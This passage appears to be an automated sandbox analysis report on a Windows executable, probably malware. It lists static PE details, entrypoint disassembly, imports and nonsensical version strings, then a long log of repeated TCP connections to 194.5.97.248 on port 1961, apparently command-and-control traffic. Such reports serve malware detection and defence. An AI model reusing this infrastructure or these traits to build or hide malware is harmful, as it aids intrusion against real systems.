SSDEEP:	12288:Nro6kYoqOR5HdRAFmzKNVky0QynxqHLUmb8uAT:NrEYyBRAFm2/ky0RxqHLLAT
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x403486
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ea4e67a31ace1a72683a99b80cf37830

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B0h]
call dword ptr [004080C0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F44Ch], eax
je 00007FE020EC52D3h
push ebx
call 00007FE020EC844Eh
cmp eax, ebx
je 00007FE020EC52C9h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007FE020EC83CAh
push esi
call dword ptr [004080B8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FE020EC52ADh
push 0000000Bh
call 00007FE020EC8422h
push 00000009h
call 00007FE020EC841Bh
push 00000007h
mov dword ptr [0042F444h], eax
call 00007FE020EC840Fh
cmp eax, ebx
je 00007FE020EC52D1h
push 0000001Eh
call eax
test eax, eax
je 00007FE020EC52C9h
or byte ptr [0042F44Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F518h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429878h
call dword ptr [0040816Ch]
push 0040A1ECh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x9c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x65ad	0x6600	False	0.675628063725	data	6.48593060343	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4634765625	data	5.26110074066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25558	0x600	False	0.470052083333	data	4.21916068772	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x9c0	0xa00	False	0.466015625	data	4.37730261639	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x38148	0x100	data	English	United States
RT_DIALOG	0x38248	0x11c	data	English	United States
RT_DIALOG	0x38364	0x60	data	English	United States
RT_VERSION	0x383c4	0x2bc	data	English	United States
RT_MANIFEST	0x38680	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Version Infos

Description	Data
LegalCopyright	Copyright fire escape
FileVersion	95.84.67.13
CompanyName	Angas Proper Group 2 Cluster
LegalTrademarks	American dollar
Comments	Benin
ProductName	arability
FileDescription	Indonesian Sign Language
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 13:57:43.352075100 CET	49731	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:43.401926994 CET	1961	49731	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:44.073777914 CET	49731	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:44.123581886 CET	1961	49731	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:44.683206081 CET	49731	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:44.733222008 CET	1961	49731	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:45.844968081 CET	49734	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:45.895118952 CET	1961	49734	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:46.574366093 CET	49734	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:46.624531984 CET	1961	49734	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:47.183406115 CET	49734	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:47.236166000 CET	1961	49734	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:48.359405041 CET	49737	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:48.409497976 CET	1961	49737	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:49.074224949 CET	49737	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:49.124393940 CET	1961	49737	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:49.636784077 CET	49737	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:49.688222885 CET	1961	49737	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:50.799252033 CET	49740	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:50.849482059 CET	1961	49740	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:51.355676889 CET	49740	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:51.406126022 CET	1961	49740	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:51.918296099 CET	49740	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:51.968597889 CET	1961	49740	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:53.068404913 CET	49742	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:53.120964050 CET	1961	49742	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:53.621481895 CET	49742	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:53.671588898 CET	1961	49742	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:54.183969975 CET	49742	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:54.234508038 CET	1961	49742	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:55.346158981 CET	49745	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:55.398158073 CET	1961	49745	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:55.902920961 CET	49745	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:55.953052998 CET	1961	49745	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:56.465475082 CET	49745	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:56.515491009 CET	1961	49745	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:57.913294077 CET	49746	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:57.963583946 CET	1961	49746	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:58.465712070 CET	49746	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:58.515902996 CET	1961	49746	194.5.97.248	192.168.2.4
Feb 22, 2021 13:57:59.028270006 CET	49746	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:57:59.078471899 CET	1961	49746	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:00.185934067 CET	49747	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:00.235944986 CET	1961	49747	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:00.747117996 CET	49747	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:00.797133923 CET	1961	49747	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:01.309602976 CET	49747	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:01.359744072 CET	1961	49747	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:02.470401049 CET	49748	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:02.520298958 CET	1961	49748	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:03.028613091 CET	49748	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:03.080817938 CET	1961	49748	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:03.591046095 CET	49748	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:03.642575979 CET	1961	49748	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:04.743042946 CET	49749	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:04.795856953 CET	1961	49749	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:05.309971094 CET	49749	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:05.360222101 CET	1961	49749	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:05.872490883 CET	49749	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:05.922924995 CET	1961	49749	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:07.025953054 CET	49752	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:07.076220036 CET	1961	49752	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:07.591339111 CET	49752	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:07.643918037 CET	1961	49752	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:08.153973103 CET	49752	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:08.204159975 CET	1961	49752	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:09.296627045 CET	49753	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:09.346679926 CET	1961	49753	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:09.857320070 CET	49753	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:09.909199953 CET	1961	49753	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:10.419747114 CET	49753	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:10.469902992 CET	1961	49753	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:11.568994999 CET	49754	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:11.620316982 CET	1961	49754	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:12.123130083 CET	49754	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:12.173362970 CET	1961	49754	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:12.685606003 CET	49754	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:12.735862970 CET	1961	49754	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:14.202236891 CET	49755	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:14.254498005 CET	1961	49755	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:14.779519081 CET	49755	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:14.830630064 CET	1961	49755	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:15.342042923 CET	49755	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:15.394045115 CET	1961	49755	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:16.731570005 CET	49756	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:16.784250975 CET	1961	49756	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:17.373569965 CET	49756	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:17.423772097 CET	1961	49756	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:18.061012030 CET	49756	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:18.111196041 CET	1961	49756	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:19.202740908 CET	49757	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:19.254518032 CET	1961	49757	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:19.764285088 CET	49757	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:19.814393997 CET	1961	49757	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:20.329847097 CET	49757	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:20.379925013 CET	1961	49757	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:21.470912933 CET	49758	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:21.524544954 CET	1961	49758	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:22.030051947 CET	49758	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:22.080391884 CET	1961	49758	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:22.592670918 CET	49758	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:22.642935991 CET	1961	49758	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:23.744354963 CET	49759	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:23.794527054 CET	1961	49759	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:24.295943022 CET	49759	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:24.346379042 CET	1961	49759	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:24.858508110 CET	49759	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:24.908565044 CET	1961	49759	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:26.026217937 CET	49760	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:26.076224089 CET	1961	49760	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:26.577337980 CET	49760	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:26.628293037 CET	1961	49760	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:27.202383041 CET	49760	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:27.253732920 CET	1961	49760	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:28.346406937 CET	49764	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:28.396409988 CET	1961	49764	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:28.937076092 CET	49764	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:28.987102032 CET	1961	49764	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:29.640089035 CET	49764	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:29.690332890 CET	1961	49764	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:30.782481909 CET	49770	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:30.832593918 CET	1961	49770	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:31.437191963 CET	49770	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:31.487195969 CET	1961	49770	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:31.999671936 CET	49770	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:32.049760103 CET	1961	49770	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:33.147819042 CET	49773	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:33.197735071 CET	1961	49773	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:33.703282118 CET	49773	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:33.755048990 CET	1961	49773	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:34.265479088 CET	49773	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:34.315466881 CET	1961	49773	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:35.410669088 CET	49776	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:35.460645914 CET	1961	49776	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:35.968775988 CET	49776	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:36.018843889 CET	1961	49776	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:36.531311035 CET	49776	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:36.581557035 CET	1961	49776	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:37.675704956 CET	49777	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:37.725873947 CET	1961	49777	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:38.234608889 CET	49777	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:38.284611940 CET	1961	49777	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:38.797152996 CET	49777	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:38.847008944 CET	1961	49777	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:39.945055962 CET	49778	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:39.997476101 CET	1961	49778	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:40.501326084 CET	49778	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:40.551951885 CET	1961	49778	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:41.063944101 CET	49778	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:41.116743088 CET	1961	49778	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:42.213661909 CET	49779	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:42.263657093 CET	1961	49779	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:42.766211033 CET	49779	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:42.820049047 CET	1961	49779	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:43.328778028 CET	49779	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:43.378788948 CET	1961	49779	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:44.508717060 CET	49783	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:44.563772917 CET	1961	49783	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:45.079171896 CET	49783	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:45.129194975 CET	1961	49783	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:45.641428947 CET	49783	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:45.694446087 CET	1961	49783	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:46.813944101 CET	49788	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:46.864137888 CET	1961	49788	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:47.376956940 CET	49788	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:47.426903963 CET	1961	49788	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:47.938853025 CET	49788	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:47.988907099 CET	1961	49788	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:49.106647968 CET	49789	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:49.157876968 CET	1961	49789	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:49.673058033 CET	49789	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:49.723182917 CET	1961	49789	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:50.236252069 CET	49789	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:50.286473036 CET	1961	49789	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:51.407205105 CET	49790	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:51.457134008 CET	1961	49790	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:51.970097065 CET	49790	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:52.022015095 CET	1961	49790	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:52.532685041 CET	49790	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:52.582799911 CET	1961	49790	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:53.710591078 CET	49791	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:53.762681007 CET	1961	49791	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:54.267146111 CET	49791	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:54.317472935 CET	1961	49791	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:54.829752922 CET	49791	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:54.880203009 CET	1961	49791	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:56.010303974 CET	49792	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:56.061999083 CET	1961	49792	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:56.564263105 CET	49792	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:56.615889072 CET	1961	49792	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:57.127350092 CET	49792	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:57.177571058 CET	1961	49792	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:58.278157949 CET	49793	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:58.328308105 CET	1961	49793	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:58.830001116 CET	49793	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:58.882550955 CET	1961	49793	194.5.97.248	192.168.2.4
Feb 22, 2021 13:58:59.392576933 CET	49793	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:58:59.442697048 CET	1961	49793	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:00.552719116 CET	49794	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:00.604748964 CET	1961	49794	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:01.111999989 CET	49794	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:01.162482023 CET	1961	49794	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:01.674041033 CET	49794	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:01.724414110 CET	1961	49794	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:03.039315939 CET	49795	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:03.092828989 CET	1961	49795	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:03.611710072 CET	49795	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:03.661983967 CET	1961	49795	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:04.174293041 CET	49795	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:04.224490881 CET	1961	49795	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:05.967900991 CET	49796	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:06.019345999 CET	1961	49796	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:06.533850908 CET	49796	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:06.585556984 CET	1961	49796	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:07.111951113 CET	49796	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:07.162040949 CET	1961	49796	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:08.276035070 CET	49797	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:08.328511000 CET	1961	49797	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:08.830952883 CET	49797	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:08.880899906 CET	1961	49797	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:09.393471956 CET	49797	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:09.443548918 CET	1961	49797	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:10.553666115 CET	49798	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:10.603671074 CET	1961	49798	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:11.112281084 CET	49798	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:11.162409067 CET	1961	49798	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:11.674942970 CET	49798	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:11.725208044 CET	1961	49798	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:12.832178116 CET	49799	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:12.883332968 CET	1961	49799	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:13.393944025 CET	49799	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:13.444221973 CET	1961	49799	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:13.956294060 CET	49799	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:14.006668091 CET	1961	49799	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:15.138698101 CET	49800	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:15.188873053 CET	1961	49800	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:15.690953016 CET	49800	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:15.740927935 CET	1961	49800	194.5.97.248	192.168.2.4
